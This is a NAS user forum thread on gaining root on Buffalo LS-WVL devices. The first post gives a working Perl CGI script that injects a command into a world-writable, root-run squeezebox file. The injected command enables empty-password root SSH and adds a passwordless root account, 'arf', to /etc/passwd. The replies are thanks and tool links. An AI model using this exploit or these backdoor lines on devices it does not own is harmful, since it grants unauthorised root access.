Buffalo NAS-Central Forums

Welcome to the Linkstation Wiki community
It is currently Wed Jun 20, 2018 11:33 pm

All times are UTC+01:00

PostPosted: Mon Aug 19, 2013 9:59 pm 
Total Newbie

I read through the different ways to get root access for the LS-WVL series and none of them were working for me
(The acp_commander.jar method kept spitting out that socket error:
"ERROR: Exception: SocketTimeoutException (Receive timed out) [ACP Send/Receive (Packet:8020 = ACP_Discover)]"
and told me to check the firewall, which I'm pretty sure wasn't causing the problem.)

Instead of figuring out why those acp_commander.jar UDP packets weren't going through, I looked for another way to root the damn thing.

Turns out all the files in /usr/local/squeezebox/ are world-writable, and one of them (slimserver.pl) gets ran as root when you start or restart the squeezebox service.
So to exploit this (and to make it easier for others), I wrote up a quick CGI script that does most of the work for you (PHP would have worked too, but I like perl more :-P).

Login to the device's web server and goto "Network" -> "Web Server" to start up that other webserver on port 81. Point that webserver to your share folder, and mount it via SMB like you normally would. When you start that web server for the first time it'll create the folders "htdocs", "cgi-bin", and "log". Goto the empty "cgi-bin" folder and create a text file called "root.cgi". Copy/paste the following code into that newly created "root.cgi":

Code:
#!/usr/bin/perl
$data=`cat /usr/local/squeezebox/slimserver.pl`;
$data=~s!for more details\..*!for more details\.\nsystem(qq(sed -e's/.*PermitRootLogin.*/PermitRootLogin yes/' -e's/.*PermitEmptyPasswords.*/PermitEmptyPasswords yes/' -e's/.*PasswordAuthentication.*/PasswordAuthentication yes/' -i /etc/sshd_config;echo arf::0:0::/:/bin/bash >> /etc/passwd;/etc/init.d/sshd.sh restart));\n!;
open(SLIM,">/usr/local/squeezebox/slimserver.pl") or die "Error: Can't write to /usr/local/squeezebox/slimserver.pl: $!\n";
print SLIM $data . "\n";
close(SLIM);
print "Start or restart squeezebox now\nAfterwards, you should be able to login via SSH using the username 'arf' and a blank password\n";
print "(When you're done, be sure to remove the 'arf' user from /etc/passwd and to remove that one 'system(qq(' line from /usr/local/squeezebox/slimserver.pl)\n";

Once you've saved that as "root.cgi" in the "cgi-bin" folder goto http://YOURNASIP:81/cgi-bin/root.cgi
After that, start or restart the squeezebox service under "Extensions" -> "MediaServer" -> "Squeezebox Server".
Now you should be able to login to the NAS via SSH using the username 'arf' and no password.
(if sshd won't restart for some reason, just reboot the whole device and you should still be able to login with the username 'arf' and a blank password).

From there you can read the other tutorials around here about changing root's password or generating your own ssh keys.

PostPosted: Sun Dec 08, 2013 6:40 pm 
Total Newbie

just wanted to thank for this guide and confirm that it worked for me, too (LS-WVL).

PostPosted: Wed Jan 01, 2014 7:38 am 
Total Newbie

Thank you. worked like a charm. I did this with LS-WVL/E (diskless).

PostPosted: Wed Jan 01, 2014 2:57 pm 

For any future readers..... acp_commander_gui will also work. It's a gui version of acp_commander which only requires that the Java Run-time Environment (JRE) be installed.

You can google that name for a link or go directly to the download: http://www.gry.ch/Java/styled/

I couldn't get the .jar file method to work for me either (though the error was different), but this gui version of it worked perfectly on my LS-WVL and TS-XEL.

PostPosted: Tue Jan 21, 2014 9:57 pm 

TheSidewinder wrote:
For any future readers..... acp_commander_gui will also work. It's a gui version of acp_commander which only requires that the Java Run-time Environment (JRE) be installed.
You can google that name for a link or go directly to the download: http://www.gry.ch/Java/styled/

Thank you thank you thank you :up:
The gui works sweet and simple on my LS-WVA/E.

JoBo

PostPosted: Fri Jan 31, 2014 7:00 am 

I would like to thank you for the new way to root.
unfortunately for some reason it doesn't work for me, I keep getting SSH session refused although the script seems to be executed successfully, I am not sure what went wrong.

just to make it clear for my self, I should have the web server and squeeze box running on the same folder? I have 1.64 firmware on LS-WVL/E

I tried to download the acp_commander GUI but it seems the website is down, would any one have the file and maybe can share it?

Thank you

PostPosted: Mon Feb 03, 2014 2:20 pm 

I "think" I just sent it.

If you still need it and didn't get it let me know.

JoBo

PostPosted: Tue Feb 04, 2014 9:10 am 
Total Newbie

Can you send it to me too? I tried the main site and it is still dead and another mirror website is working but the download links are dead :cry:

Appreatiate your help

PostPosted: Tue Feb 04, 2014 7:28 pm 

JoBo wrote:
I "think" I just sent it.

If you still need it and didn't get it let me know.

JoBo

I still didn't get it unfortunately :?

PostPosted: Sat Feb 08, 2014 12:16 am 

Dunno how long the link will be good, but it can be found here now.

http://advanxer.com/blog/2013/02/buffal ... ander-gui/

PostPosted: Sun Feb 23, 2014 1:19 pm 

Shomar and HYP

check your in boxes :mrgreen: